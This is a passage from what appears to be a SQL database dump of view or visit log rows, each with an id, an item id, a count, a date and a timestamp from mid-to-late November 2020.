01:26:35'),(8467,2159,1,'2020-11-16','2020-11-16 01:36:19'),(8468,89,1,'2020-11-16','2020-11-16 01:54:32'),(8469,3069,1,'2020-11-16','2020-11-16 03:18:15'),(8470,91,1,'2020-11-16','2020-11-16 03:46:34'),(8471,1586,1,'2020-11-16','2020-11-16 03:56:17'),(8472,2159,1,'2020-11-16','2020-11-16 04:12:29'),(8473,2159,1,'2020-11-16','2020-11-16 04:12:31'),(8474,2159,1,'2020-11-16','2020-11-16 04:13:25'),(8475,3030,1,'2020-11-16','2020-11-16 04:27:57'),(8476,1582,1,'2020-11-16','2020-11-16 05:09:03'),(8477,2769,1,'2020-11-16','2020-11-16 05:16:58'),(8478,1614,1,'2020-11-16','2020-11-16 05:26:07'),(8479,91,1,'2020-11-16','2020-11-16 05:46:52'),(8480,570,1,'2020-11-16','2020-11-16 07:24:31'),(8481,1582,1,'2020-11-16','2020-11-16 07:37:13'),(8482,3058,1,'2020-11-16','2020-11-16 07:37:32'),(8483,80,1,'2020-11-16','2020-11-16 09:43:49'),(8484,2159,1,'2020-11-16','2020-11-16 10:04:00'),(8485,1582,1,'2020-11-16','2020-11-16 12:06:37'),(8486,2309,1,'2020-11-16','2020-11-16 13:50:00'),(8487,1766,1,'2020-11-16','2020-11-16 14:12:52'),(8488,2159,1,'2020-11-16','2020-11-16 14:20:05'),(8489,1604,1,'2020-11-16','2020-11-16 16:01:00'),(8490,1604,1,'2020-11-16','2020-11-16 16:19:05'),(8491,1586,1,'2020-11-16','2020-11-16 17:16:22'),(8492,1602,1,'2020-11-16','2020-11-16 17:17:45'),(8493,1602,1,'2020-11-16','2020-11-16 17:19:10'),(8494,1588,1,'2020-11-16','2020-11-16 17:31:24'),(8495,3083,1,'2020-11-16','2020-11-16 17:41:28'),(8496,3030,1,'2020-11-16','2020-11-16 17:41:45'),(8497,3058,1,'2020-11-16','2020-11-16 17:41:57'),(8498,1718,1,'2020-11-16','2020-11-16 19:58:21'),(8499,1600,1,'2020-11-16','2020-11-16 20:03:26'),(8500,91,1,'2020-11-16','2020-11-16 20:18:52'),(8501,3081,1,'2020-11-16','2020-11-16 20:21:08'),(8502,72,1,'2020-11-16','2020-11-16 20:24:12'),(8503,68,1,'2020-11-16','2020-11-16 20:24:29'),(8504,91,1,'2020-11-16','2020-11-16 20:24:39'),(8505,68,1,'2020-11-16','2020-11-16 20:25:49'),(8506,2165,1,'2020-11-16','2020-11-16 20:40:08'),(8507,2309,1,'2020-11-16','2020-11-16 22:10:50'),(8508,1598,1,'2020-11-16','2020-11-16 23:27:38'),(8509,1600,1,'2020-11-16','2020-11-16 23:44:09'),(8510,2309,1,'2020-11-17','2020-11-17 00:14:10'),(8511,2159,1,'2020-11-17','2020-11-17 01:46:00'),(8512,1604,1,'2020-11-17','2020-11-17 02:17:43'),(8513,3083,1,'2020-11-17','2020-11-17 03:47:15'),(8514,2309,1,'2020-11-17','2020-11-17 04:16:19'),(8515,2503,1,'2020-11-17','2020-11-17 04:18:36'),(8516,76,1,'2020-11-17','2020-11-17 04:36:42'),(8517,1600,1,'2020-11-17','2020-11-17 05:38:05'),(8518,1718,1,'2020-11-17','2020-11-17 06:37:22'),(8519,1718,1,'2020-11-17','2020-11-17 06:58:07'),(8520,1718,1,'2020-11-17','2020-11-17 06:58:09'),(8521,1718,1,'2020-11-17','2020-11-17 07:02:36'),(8522,1718,1,'2020-11-17','2020-11-17 09:03:53'),(8523,1718,1,'2020-11-17','2020-11-17 09:04:01'),(8524,1718,1,'2020-11-17','2020-11-17 09:04:51'),(8525,1614,1,'2020-11-17','2020-11-17 09:14:34'),(8526,1600,1,'2020-11-17','2020-11-17 09:16:57'),(8527,2457,1,'2020-11-17','2020-11-17 10:21:27'),(8528,1604,1,'2020-11-17','2020-11-17 10:31:32'),(8529,1604,1,'2020-11-17','2020-11-17 10:32:58'),(8530,1604,1,'2020-11-17','2020-11-17 10:33:05'),(8531,2159,1,'2020-11-17','2020-11-17 10:37:30'),(8532,1598,1,'2020-11-17','2020-11-17 10:50:36'),(8533,68,1,'2020-11-17','2020-11-17 10:51:15'),(8534,76,1,'2020-11-17','2020-11-17 10:51:29'),(8535,68,1,'2020-11-17','2020-11-17 10:52:08'),(8536,1586,1,'2020-11-17','2020-11-17 11:18:18'),(8537,1614,1,'2020-11-17','2020-11-17 11:33:32'),(8538,1604,1,'2020-11-17','2020-11-17 12:07:59'),(8539,2609,1,'2020-11-17','2020-11-17 12:28:05'),(8540,1718,1,'2020-11-17','2020-11-17 12:46:28'),(8541,2309,1,'2020-11-17','2020-11-17 13:20:26'),(8542,1588,1,'2020-11-17','2020-11-17 13:38:58'),(8543,483,1,'2020-11-17','2020-11-17 13:51:16'),(8544,2457,1,'2020-11-17','2020-11-17 14:53:25'),(8545,87,1,'2020-11-17','2020-11-17 14:53:52'),(8546,486,1,'2020-11-17','2020-11-17 14:55:02'),(8547,87,1,'2020-11-17','2020-11-17 14:55:28'),(8548,2457,1,'2020-11-17','2020-11-17 14:55:32'),(8549,2309,1,'2020-11-17','2020-11-17 15:53:15'),(8550,2309,1,'2020-11-17','2020-11-17 16:31:15'),(8551,1600,1,'2020-11-17','2020-11-17 17:59:34'),(8552,2159,1,'2020-11-17','2020-11-17 18:45:58'),(8553,74,1,'2020-11-17','2020-11-17 18:50:30'),(8554,3030,1,'2020-11-17','2020-11-17 19:00:34'),(8555,1600,1,'2020-11-17','2020-11-17 19:58:05'),(8556,1718,1,'2020-11-17','2020-11-17 21:42:29'),(8557,1718,1,'2020-11-17','2020-11-17 21:42:55'),(8558,1718,1,'2020-11-17','2020-11-17 21:44:05'),(8559,1718,1,'2020-11-17','2020-11-17 21:44:18'),(8560,3180,1,'2020-11-17','2020-11-17 21:50:40'),(8561,1718,1,'2020-11-17','2020-11-17 22:01:33'),(8562,2309,1,'2020-11-17','2020-11-17 22:02:59'),(8563,3058,1,'2020-11-17','2020-11-17 22:14:54'),(8564,1732,1,'2020-11-17','2020-11-17 22:26:43'),(8565,1606,1,'2020-11-17','2020-11-17 22:52:11'),(8566,1612,1,'2020-11-18','2020-11-18 04:18:13'),(8567,3030,1,'2020-11-18','2020-11-18 04:24:15'),(8568,2309,1,'2020-11-18','2020-11-18 05:59:42'),(8569,1776,1,'2020-11-18','2020-11-18 06:00:16'),(8570,2309,1,'2020-11-18','2020-11-18 07:45:47'),(8571,1588,1,'2020-11-18','2020-11-18 09:44:42'),(8572,1614,1,'2020-11-18','2020-11-18 09:58:14'),(8573,68,1,'2020-11-18','2020-11-18 09:58:52'),(8574,76,1,'2020-11-18','2020-11-18 09:58:55'),(8575,89,1,'2020-11-18','2020-11-18 10:00:02'),(8576,1614,1,'2020-11-18','2020-11-18 10:00:15'),(8577,76,1,'2020-11-18','2020-11-18 10:32:10'),(8578,474,1,'2020-11-18','2020-11-18 10:40:44'),(8579,468,1,'2020-11-18','2020-11-18 10:41:45'),(8580,3045,1,'2020-11-18','2020-11-18 10:45:04'),(8581,3030,1,'2020-11-18','2020-11-18 10:46:12'),(8582,3030,1,'2020-11-18','2020-11-18 10:50:05'),(8583,3045,1,'2020-11-18','2020-11-18 10:50:12'),(8584,1586,1,'2020-11-18','2020-11-18 10:55:00'),(8585,3045,1,'2020-11-18','2020-11-18 10:55:29'),(8586,3045,1,'2020-11-18','2020-11-18 10:55:36'),(8587,3090,1,'2020-11-18','2020-11-18 10:57:58'),(8588,1614,1,'2020-11-18','2020-11-18 11:44:11'),(8589,91,1,'2020-11-18','2020-11-18 12:18:05'),(8590,2457,1,'2020-11-18','2020-11-18 12:23:45'),(8591,1606,1,'2020-11-18','2020-11-18 13:33:55'),(8592,84,1,'2020-11-18','2020-11-18 14:49:23'),(8593,2490,1,'2020-11-18','2020-11-18 15:28:42'),(8594,2159,1,'2020-11-18','2020-11-18 15:30:16'),(8595,2159,1,'2020-11-18','2020-11-18 15:31:32'),(8596,2751,1,'2020-11-18','2020-11-18 15:44:44'),(8597,1718,1,'2020-11-18','2020-11-18 16:04:17'),(8598,2751,1,'2020-11-18','2020-11-18 16:05:01'),(8599,2751,1,'2020-11-18','2020-11-18 16:05:13'),(8600,76,1,'2020-11-18','2020-11-18 16:05:29'),(8601,87,1,'2020-11-18','2020-11-18 16:05:42'),(8602,76,1,'2020-11-18','2020-11-18 16:06:03'),(8603,2751,1,'2020-11-18','2020-11-18 16:06:09'),(8604,2159,1,'2020-11-18','2020-11-18 16:26:16'),(8605,2159,1,'2020-11-18','2020-11-18 16:26:27'),(8606,1614,1,'2020-11-18','2020-11-18 16:48:28'),(8607,1614,1,'2020-11-18','2020-11-18 16:50:24'),(8608,1600,1,'2020-11-18','2020-11-18 17:11:57'),(8609,2309,1,'2020-11-18','2020-11-18 17:16:23'),(8610,1604,1,'2020-11-18','2020-11-18 17:27:49'),(8611,2159,1,'2020-11-18','2020-11-18 17:47:08'),(8612,2159,1,'2020-11-18','2020-11-18 17:47:24'),(8613,1600,1,'2020-11-18','2020-11-18 17:51:05'),(8614,76,1,'2020-11-18','2020-11-18 18:04:17'),(8615,2751,1,'2020-11-18','2020-11-18 18:46:33'),(8616,108,1,'2020-11-18','2020-11-18 19:00:25'),(8617,84,1,'2020-11-18','2020-11-18 19:13:42'),(8618,570,1,'2020-11-18','2020-11-18 19:47:05'),(8619,3069,1,'2020-11-18','2020-11-18 20:05:40'),(8620,3005,1,'2020-11-18','2020-11-18 20:59:50'),(8621,3099,1,'2020-11-18','2020-11-18 22:22:03'),(8622,1586,1,'2020-11-18','2020-11-18 22:24:27'),(8623,470,1,'2020-11-18','2020-11-18 23:03:25'),(8624,2159,1,'2020-11-19','2020-11-19 00:18:13'),(8625,2309,1,'2020-11-19','2020-11-19 02:21:03'),(8626,1600,1,'2020-11-19','2020-11-19 03:37:15'),(8627,2309,1,'2020-11-19','2020-11-19 03:48:21'),(8628,1604,1,'2020-11-19','2020-11-19 04:18:59'),(8629,1604,1,'2020-11-19','2020-11-19 05:17:20'),(8630,1598,1,'2020-11-19','2020-11-19 05:27:38'),(8631,3104,1,'2020-11-19','2020-11-19 05:54:42'),(8632,2813,1,'2020-11-19','2020-11-19 06:01:45'),(8633,2704,1,'2020-11-19','2020-11-19 06:27:36'),(8634,1600,1,'2020-11-19','2020-11-19 07:08:15'),(8635,2309,1,'2020-11-19','2020-11-19 07:41:14'),(8636,3124,1,'2020-11-19','2020-11-19 07:48:23'),(8637,1614,1,'2020-11-19','2020-11-19 08:11:37'),(8638,80,1,'2020-11-19','2020-11-19 08:12:56'),(8639,1614,1,'2020-11-19','2020-11-19 08:16:51'),(8640,2609,1,'2020-11-19','2020-11-19 08:38:33'),(8641,1606,1,'2020-11-19','2020-11-19 08:48:20'),(8642,1586,1,'2020-11-19','2020-11-19 09:00:51'),(8643,1614,1,'2020-11-19','2020-11-19 09:28:37'),(8644,89,1,'2020-11-19','2020-11-19 10:02:31'),(8645,1614,1,'2020-11-19','2020-11-19 10:05:46'),(8646,1614,1,'2020-11-19','2020-11-19 10:11:56'),(8647,2159,1,'2020-11-19','2020-11-19 11:57:11'),(8648,1718,1,'2020-11-19','2020-11-19 13:28:29'),(8649,1600,1,'2020-11-19','2020-11-19 14:25:43'),(8650,1774,1,'2020-11-19','2020-11-19 15:00:46'),(8651,2769,1,'2020-11-19','2020-11-19 15:17:40'),(8652,2309,1,'2020-11-19','2020-11-19 15:19:28'),(8653,3107,1,'2020-11-19','2020-11-19 15:19:52'),(8654,3104,1,'2020-11-19','2020-11-19 15:41:52'),(8655,1600,1,'2020-11-19','2020-11-19 15:59:16'),(8656,1604,1,'2020-11-19','2020-11-19 16:19:49'),(8657,1586,1,'2020-11-19','2020-11-19 16:38:43'),(8658,2457,1,'2020-11-19','2020-11-19 16:43:11'),(8659,1614,1,'2020-11-19','2020-11-19 17:14:31'),(8660,1774,1,'2020-11-19','2020-11-19 17:14:32'),(8661,2904,1,'2020-11-19','2020-11-19 17:51:30'),(8662,2609,1,'2020-11-19','2020-11-19 18:00:12'),(8663,2609,1,'2020-11-19','2020-11-19 18:19:02'),(8664,3109,1,'2020-11-19','2020-11-19 19:16:03'),(8665,3102,1,'2020-11-19','2020-11-19 19:33:52'),(8666,2769,1,'2020-11-19','2020-11-19 20:58:13'),(8667,1588,1,'2020-11-19','2020-11-19 21:08:02'),(8668,481,1,'2020-11-19','2020-11-19 21:29:56'),(8669,74,1,'2020-11-19','2020-11-19 21:30:28'),(8670,2964,1,'2020-11-19','2020-11-19 21:48:24'),(8671,2159,1,'2020-11-19','2020-11-19 21:58:35'),(8672,2617,1,'2020-11-19','2020-11-19 22:18:31'),(8673,1582,1,'2020-11-19','2020-11-19 22:28:28'),(8674,72,1,'2020-11-19','2020-11-19 23:59:07'),(8675,91,1,'2020-11-20','2020-11-20 00:38:26'),(8676,2609,1,'2020-11-20','2020-11-20 03:09:52'),(8677,3226,1,'2020-11-20','2020-11-20 03:13:24'),(8678,1604,1,'2020-11-20','2020-11-20 03:20:52'),(8679,1614,1,'2020-11-20','2020-11-20 03:29:47'),(8680,570,1,'2020-11-20','2020-11-20 04:19:29'),(8681,2309,1,'2020-11-20','2020-11-20 05:31:36'),(8682,1586,1,'2020-11-20','2020-11-20 06:40:26'),(8683,3107,1,'2020-11-20','2020-11-20 07:10:27'),(8684,2159,1,'2020-11-20','2020-11-20 07:20:15'),(8685,1600,1,'2020-11-20','2020-11-20 07:23:11'),(8686,1778,1,'2020-11-20','2020-11-20 08:16:33'),(8687,479,1,'2020-11-20','2020-11-20 08:20:59'),(8688,2165,1,'2020-11-20','2020-11-20 08:44:46'),(8689,2159,1,'2020-11-20','2020-11-20 08:47:29'),(8690,1606,1,'2020-11-20','2020-11-20 10:11:40'),(8691,1774,1,'2020-11-20','2020-11-20 10:28:45'),(8692,2309,1,'2020-11-20','2020-11-20 11:16:47'),(8693,1774,1,'2020-11-20','2020-11-20 11:17:04'),(8694,2309,1,'2020-11-20','2020-11-20 11:22:29'),(8695,3096,1,'2020-11-20','2020-11-20 12:14:26'),(8696,2159,1,'2020-11-20','2020-11-20 12:20:47'),(8697,1600,1,'2020-11-20','2020-11-20 12:23:02'),(8698,1598,1,'2020-11-20','2020-11-20 12:29:06'),(8699,1604,1,'2020-11-20','2020-11-20 12:32:37'),(8700,3226,1,'2020-11-20','2020-11-20 12:42:59'),(8701,1614,1,'2020-11-20','2020-11-20 13:33:30'),(8702,91,1,'2020-11-20','2020-11-20 13:49:10'),(8703,91,1,'2020-11-20','2020-11-20 13:52:22'),(8704,1594,1,'2020-11-20','2020-11-20 13:57:11'),(8705,2309,1,'2020-11-20','2020-11-20 14:35:23'),(8706,91,1,'2020-11-20','2020-11-20 14:35:28'),(8707,68,1,'2020-11-20','2020-11-20 14:38:54'),(8708,91,1,'2020-11-20','2020-11-20 14:39:37'),(8709,87,1,'2020-11-20','2020-11-20 14:42:35'),(8710,570,1,'2020-11-20','2020-11-20 14:43:39'),(8711,1711,1,'2020-11-20','2020-11-20 15:04:00'),(8712,1774,1,'2020-11-20','2020-11-20 15:05:42'),(8713,2457,1,'2020-11-20','2020-11-20 15:29:23'),(8714,76,1,'2020-11-20','2020-11-20 15:30:39'),(8715,2457,1,'2020-11-20','2020-11-20 15:43:09'),(8716,570,1,'2020-11-20','2020-11-20 15:45:20'),(8717,1600,1,'2020-11-20','2020-11-20 16:06:13'),(8718,2159,1,'2020-11-20','2020-11-20 16:24:07'),(8719,3229,1,'2020-11-20','2020-11-20 17:36:43'),(8720,3229,1,'2020-11-20','2020-11-20 17:55:51'),(8721,1590,1,'2020-11-20','2020-11-20 18:15:33'),(8722,2989,1,'2020-11-20','2020-11-20 18:40:15'),(8723,2159,1,'2020-11-20','2020-11-20 18:53:50'),(8724,2159,1,'2020-11-20','2020-11-20 18:54:11'),(8725,3102,1,'2020-11-20','2020-11-20 19:36:33'),(8726,2309,1,'2020-11-20','2020-11-20 20:26:12'),(8727,2159,1,'2020-11-20','2020-11-20 20:27:01'),(8728,2159,1,'2020-11-20','2020-11-20 20:27:53'),(8729,1588,1,'2020-11-20','2020-11-20 20:56:43'),(8730,2775,1,'2020-11-20','2020-11-20 22:08:35'),(8731,2609,1,'2020-11-20','2020-11-20 22:46:35'),(8732,1743,1,'2020-11-20','2020-11-20 22:56:32'),(8733,486,1,'2020-11-20','2020-11-20 23:10:11'),(8734,2309,1,'2020-11-20','2020-11-20 23:37:18'),(8735,1582,1,'2020-11-20','2020-11-20 23:47:20'),(8736,2419,1,'2020-11-21','2020-11-21 00:07:27'),(8737,1600,1,'2020-11-21','2020-11-21 00:57:33'),(8738,2159,1,'2020-11-21','2020-11-21 01:07:39'),(8739,570,1,'2020-11-21','2020-11-21 01:17:40'),(8740,471,1,'2020-11-21','2020-11-21 01:27:37'),(8741,3069,1,'2020-11-21','2020-11-21 03:38:01'),(8742,1600,1,'2020-11-21','2020-11-21 05:58:36'),(8743,2309,1,'2020-11-21','2020-11-21 06:09:02'),(8744,1606,1,'2020-11-21','2020-11-21 06:18:38'),(8745,1604,1,'2020-11-21','2020-11-21 06:18:42'),(8746,2813,1,'2020-11-21','2020-11-21 06:28:45'),(8747,1766,1,'2020-11-21','2020-11-21 07:28:45'),(8748,1588,1,'2020-11-21','2020-11-21 07:38:33'),(8749,2309,1,'2020-11-21','2020-11-21 07:48:21'),(8750,2609,1,'2020-11-21','2020-11-21 07:58:33'),(8751,76,1,'2020-11-21','2020-11-21 08:18:41'),(8752,2150,1,'2020-11-21','2020-11-21 08:33:47'),(8753,1614,1,'2020-11-21','2020-11-21 08:58:55'),(8754,1713,1,'2020-11-21','2020-11-21 09:21:41'),(8755,2159,1,'2020-11-21','2020-11-21 10:18:00'),(8756,2159,1,'2020-11-21','2020-11-21 10:18:16'),(8757,2159,1,'2020-11-21','2020-11-21 10:21:30'),(8758,570,1,'2020-11-21','2020-11-21 11:11:54'),(8759,3060,1,'2020-11-21','2020-11-21 11:53:13'),(8760,1588,1,'2020-11-21','2020-11-21 12:12:40'),(8761,3034,1,'2020-11-21','2020-11-21 12:48:24'),(8762,3069,1,'2020-11-21','2020-11-21 13:31:32'),(8763,89,1,'2020-11-21','2020-11-21 13:42:06'),(8764,72,1,'2020-11-21','2020-11-21 13:51:50'),(8765,1600,1,'2020-11-21','2020-11-21 15:25:14'),(8766,2309,1,'2020-11-21','2020-11-21 16:32:15'),(8767,2309,1,'2020-11-21','2020-11-21 17:22:36'),(8768,1604,1,'2020-11-21','2020-11-21 17:42:27'),(8769,2609,1,'2020-11-21','2020-11-21 17:52:39'),(8770,1614,1,'2020-11-21','2020-11-21 18:32:42'),(8771,2769,1,'2020-11-21','2020-11-21 18:42:54'),(8772,76,1,'2020-11-21','2020-11-21 18:52:41'),(8773,1600,1,'2020-11-21','2020-11-21 19:00:17'),(8774,1600,1,'2020-11-21','2020-11-21 19:00:17'),(8775,2159,1,'2020-11-21','2020-11-21 19:12:56'),(8776,2801,1,'2020-11-21','2020-11-21 19:50:20'),(8777,1598,1,'2020-11-21','2020-11-21 20:28:41'),(8778,2411,1,'2020-11-21','2020-11-21 20:34:05'),(8779,1588,1,'2020-11-21','2020-11-21 21:03:43'),(8780,570,1,'2020-11-21','2020-11-21 21:53:43'),(8781,1600,1,'2020-11-21','2020-11-21 22:13:59'),(8782,1586,1,'2020-11-21','2020-11-21 23:03:52'),(8783,91,1,'2020-11-21','2020-11-21 23:48:46'),(8784,1600,1,'2020-11-22','2020-11-22 00:03:56'),(8785,1596,1,'2020-11-22','2020-11-22 00:13:37'),(8786,2993,1,'2020-11-22','2020-11-22 00:13:59'),(8787,2813,1,'2020-11-22','2020-11-22 00:47:49'),(8788,2309,1,'2020-11-22','2020-11-22 02:05:28'),(8789,1604,1,'2020-11-22','2020-11-22 03:35:52'),(8790,2609,1,'2020-11-22','2020-11-22 03:45:59'),(8791,1604,1,'2020-11-22','2020-11-22 04:06:21'),(8792,2159,1,'2020-11-22','2020-11-22 05:06:52'),(8793,2971,1,'2020-11-22','2020-11-22 05:51:34'),(8794,1588,1,'2020-11-22','2020-11-22 05:57:18'),(8795,1614,1,'2020-11-22','2020-11-22 06:27:43'),(8796,570,1,'2020-11-22','2020-11-22 06:37:33'),(8797,1600,1,'2020-11-22','2020-11-22 06:47:17'),(8798,1614,1,'2020-11-22','2020-11-22 06:50:05'),(8799,3109,1,'2020-11-22','2020-11-22 07:07:30'),(8800,80,1,'2020-11-22','2020-11-22 07:17:28'),(8801,68,1,'2020-11-22','2020-11-22 07:32:22'),(8802,1600,1,'2020-11-22','2020-11-22 09:18:17'),(8803,1594,1,'2020-11-22','2020-11-22 09:58:18'),(8804,2457,1,'2020-11-22','2020-11-22 10:18:39'),(8805,2309,1,'2020-11-22','2020-11-22 11:49:06'),(8806,2309,1,'2020-11-22','2020-11-22 12:08:41'),(8807,2410,1,'2020-11-22','2020-11-22 12:28:49'),(8808,1718,1,'2020-11-22','2020-11-22 12:38:51'),(8809,1604,1,'2020-11-22','2020-11-22 13:09:22'),(8810,1604,1,'2020-11-22','2020-11-22 13:59:52'),(8811,2159,1,'2020-11-22','2020-11-22 14:30:02'),(8812,2769,1,'2020-11-22','2020-11-22 14:40:00'),(8813,2609,1,'2020-11-22','2020-11-22 14:40:08'),(8814,1588,1,'2020-11-22','2020-11-22 14:49:59'),(8815,2248,1,'2020-11-22','2020-11-22 15:00:22'),(8816,3097,1,'2020-11-22','2020-11-22 15:12:08'),(8817,1600,1,'2020-11-22','2020-11-22 16:00:39'),(8818,3229,1,'2020-11-22','2020-11-22 16:58:48'),(8819,89,1,'2020-11-22','2020-11-22 16:59:49'),(8820,570,1,'2020-11-22','2020-11-22 17:10:50'),(8821,1614,1,'2020-11-22','2020-11-22 17:30:50'),(8822,89,1,'2020-11-22','2020-11-22 17:51:12'),(8823,2964,1,'2020-11-22','2020-11-22 17:51:43'),(8824,1586,1,'2020-11-22','2020-11-22 17:52:46'),(8825,1608,1,'2020-11-22','2020-11-22 17:52:53'),(8826,1600,1,'2020-11-22','2020-11-22 18:00:41'),(8827,1726,1,'2020-11-22','2020-11-22 18:10:40'),(8828,91,1,'2020-11-22','2020-11-22 18:20:31'),(8829,2911,1,'2020-11-22','2020-11-22 18:30:29'),(8830,2769,1,'2020-11-22','2020-11-22 19:30:33'),(8831,1778,1,'2020-11-22','2020-11-22 19:35:26'),(8832,3045,1,'2020-11-22','2020-11-22 19:44:31'),(8833,2769,1,'2020-11-22','2020-11-22 19:50:38'),(8834,1582,1,'2020-11-22','2020-11-22 20:30:20'),(8835,3069,1,'2020-11-22','2020-11-22 20:40:34'),(8836,2309,1,'2020-11-22','2020-11-22 20:50:22'),(8837,1606,1,'2020-11-22','2020-11-22 22:24:59'),(8838,2989,1,'2020-11-22','2020-11-22 23:43:39'),(8839,1604,1,'2020-11-22','2020-11-22 23:45:57'),(8840,1588,1,'2020-11-23','2020-11-23 00:16:10'),(8841,2395,1,'2020-11-23','2020-11-23 00:25:59'),(8842,2159,1,'2020-11-23','2020-11-23 00:36:08'),(8843,89,1,'2020-11-23','2020-11-23 00:47:08'),(8844,2609,1,'2020-11-23','2020-11-23 00:56:39'),(8845,570,1,'2020-11-23','2020-11-23 01:37:07'),(8846,1600,1,'2020-11-23','2020-11-23 02:07:20'),(8847,1614,1,'2020-11-23','2020-11-23 02:17:27'),(8848,2159,1,'2020-11-23','2020-11-23 03:07:39'),(8849,3127,1,'2020-11-23','2020-11-23 03:47:36'),(8850,2769,1,'2020-11-23','2020-11-23 03:57:27'),(8851,1586,1,'2020-11-23','2020-11-23 04:17:39'),(8852,1582,1,'2020-11-23','2020-11-23 04:47:48'),(8853,80,1,'2020-11-23','2020-11-23 04:58:10'),(8854,1600,1,'2020-11-23','2020-11-23 05:50:33'),(8855,2309,1,'2020-11-23','2020-11-23 06:08:46'),(8856,1586,1,'2020-11-23','2020-11-23 07:04:28'),(8857,468,1,'2020-11-23','2020-11-23 07:19:32'),(8858,3004,1,'2020-11-23','2020-11-23 07:59:49'),(8859,2971,1,'2020-11-23','2020-11-23 08:29:48'),(8860,68,1,'2020-11-23','2020-11-23 08:39:40'),(8861,2503,1,'2020-11-23','2020-11-23 09:08:36'),(8862,1604,1,'2020-11-23','2020-11-23 09:09:39'),(8863,1766,1,'2020-11-23','2020-11-23 09:32:37'),(8864,1588,1,'2020-11-23','2020-11-23 09:39:41'),(8865,1699,1,'2020-11-23','2020-11-23 09:59:51'),(8866,2159,1,'2020-11-23','2020-11-23 10:29:46'),(8867,1614,1,'2020-11-23','2020-11-23 10:40:20'),(8868,1600,1,'2020-11-23','2020-11-23 11:00:28'),(8869,570,1,'2020-11-23','2020-11-23 11:20:16'),(8870,1586,1,'2020-11-23','2020-11-23 11:35:53'),(8871,2751,1,'2020-11-23','2020-11-23 12:38:37'),(8872,3099,1,'2020-11-23','2020-11-23 12:40:33'),(8873,2751,1,'2020-11-23','2020-11-23 12:54:12'),(8874,3087,1,'2020-11-23','2020-11-23 12:54:21'),(8875,2751,1,'2020-11-23','2020-11-23 12:58:18'),(8876,2993,1,'2020-11-23','2020-11-23 12:58:25'),(8877,68,1,'2020-11-23','2020-11-23 13:00:55'),(8878,2993,1,'2020-11-23','2020-11-23 13:30:17'),(8879,2751,1,'2020-11-23','2020-11-23 13:30:21'),(8880,1734,1,'2020-11-23','2020-11-23 13:57:13'),(8881,2769,1,'2020-11-23','2020-11-23 14:01:21'),(8882,84,1,'2020-11-23','2020-11-23 15:03:53'),(8883,2309,1,'2020-11-23','2020-11-23 15:11:40'),(8884,2063,1,'2020-11-23','2020-11-23 15:30:29'),(8885,2813,1,'2020-11-23','2020-11-23 15:33:08'),(8886,1612,1,'2020-11-23','2020-11-23 16:02:57'),(8887,1718,1,'2020-11-23','2020-11-23 16:11:57'),(8888,1586,1,'2020-11-23','2020-11-23 16:42:36'),(8889,1586,1,'2020-11-23','2020-11-23 17:41:00'),(8890,1604,1,'2020-11-23','2020-11-23 18:02:54'),(8891,1588,1,'2020-11-23','2020-11-23 18:12:49'),(8892,3069,1,'2020-11-23','2020-11-23 18:26:46'),(8893,2904,1,'2020-11-23','2020-11-23 18:33:07'),(8894,2159,1,'2020-11-23','2020-11-23 19:03:21'),(8895,2609,1,'2020-11-23','2020-11-23 19:15:18'),(8896,2410,1,'2020-11-23','2020-11-23 20:00:55'),(8897,1600,1,'2020-11-23','2020-11-23 20:13:16'),(8898,87,1,'2020-11-23','2020-11-23 20:31:32'),(8899,488,1,'2020-11-23','2020-11-23 20:32:21'),(8900,468,1,'2020-11-23','2020-11-23 20:35:09'),(8901,474,1,'2020-11-23','2020-11-23 20:50:31'),(8902,1600,1,'2020-11-23','2020-11-23 21:01:35'),(8903,570,1,'2020-11-23','2020-11-23 21:33:09'),(8904,1614,1,'2020-11-23','2020-11-23 21:43:11'),(8905,1770,1,'2020-11-23','2020-11-23 21:53:28'),(8906,1614,1,'2020-11-23','2020-11-23 22:44:14'),(8907,3027,1,'2020-11-23','2020-11-23 23:24:17'),(8908,1604,1,'2020-11-24','2020-11-24 00:04:19'),(8909,1586,1,'2020-11-24','2020-11-24 00:43:34'),(8910,2309,1,'2020-11-24','2020-11-24 00:44:39'),(8911,2309,1,'2020-11-24','2020-11-24 00:55:05'),(8912,1586,1,'2020-11-24','2020-11-24 02:25:41'),(8913,2804,1,'2020-11-24','2020-11-24 02:40:24'),(8914,2508,1,'2020-11-24','2020-11-24 02:45:24'),(8915,2159,1,'2020-11-24','2020-11-24 04:35:54'),(8916,1600,1,'2020-11-24','2020-11-24 04:37:19'),(8917,1600,1,'2020-11-24','2020-11-24 04:38:35'),(8918,1743,1,'2020-11-24','2020-11-24 04:40:25'),(8919,1600,1,'2020-11-24','2020-11-24 04:40:48'),(8920,1600,1,'2020-11-24','2020-11-24 04:56:38'),(8921,2609,1,'2020-11-24','2020-11-24 05:06:22'),(8922,1606,1,'2020-11-24','2020-11-24 05:56:12'),(8923,570,1,'2020-11-24','2020-11-24 07:16:22'),(8924,1614,1,'2020-11-24','2020-11-24 07:26:32'),(8925,1588,1,'2020-11-24','2020-11-24 07:46:00'),(8926,1582,1,'2020-11-24','2020-11-24 07:56:46'),(8927,91,1,'2020-11-24','2020-11-24 07:59:01'),(8928,1606,1,'2020-11-24','2020-11-24 08:14:22'),(8929,3069,1,'2020-11-24','2020-11-24 08:21:40'),(8930,2813,1,'2020-11-24','2020-11-24 08:43:27'),(8931,2309,1,'2020-11-24','2020-11-24 09:17:36'),(8932,2309,1,'2020-11-24','2020-11-24 09:23:26'),(8933,89,1,'2020-11-24','2020-11-24 09:26:24'),(8934,1604,1,'2020-11-24','2020-11-24 09:29:09'),(8935,1610,1,'2020-11-24','2020-11-24 09:54:19'),(8936,1610,1,'2020-11-24','2020-11-24 09:54:20'),(8937,74,1,'2020-11-24','2020-11-24 09:54:46'),(8938,108,1,'2020-11-24','2020-11-24 10:13:59'),(8939,1604,1,'2020-11-24','2020-11-24 12:48:06'),(8940,2159,1,'2020-11-24','2020-11-24 13:08:03'),(8941,108,1,'2020-11-24','2020-11-24 13:27:55'),(8942,1718,1,'2020-11-24','2020-11-24 13:49:05'),(8943,1582,1,'2020-11-24','2020-11-24 13:49:07'),(8944,1600,1,'2020-11-24','2020-11-24 13:58:02'),(8945,2609,1,'2020-11-24','2020-11-24 14:08:03'),(8946,72,1,'2020-11-24','2020-11-24 14:28:04'),(8947,80,1,'2020-11-24','2020-11-24 15:11:09'),(8948,570,1,'2020-11-24','2020-11-24 15:22:09'),(8949,1612,1,'2020-11-24','2020-11-24 15:28:50'),(8950,91,1,'2020-11-24','2020-11-24 15:29:12'),(8951,80,1,'2020-11-24','2020-11-24 15:36:48'),(8952,1612,1,'2020-11-24','2020-11-24 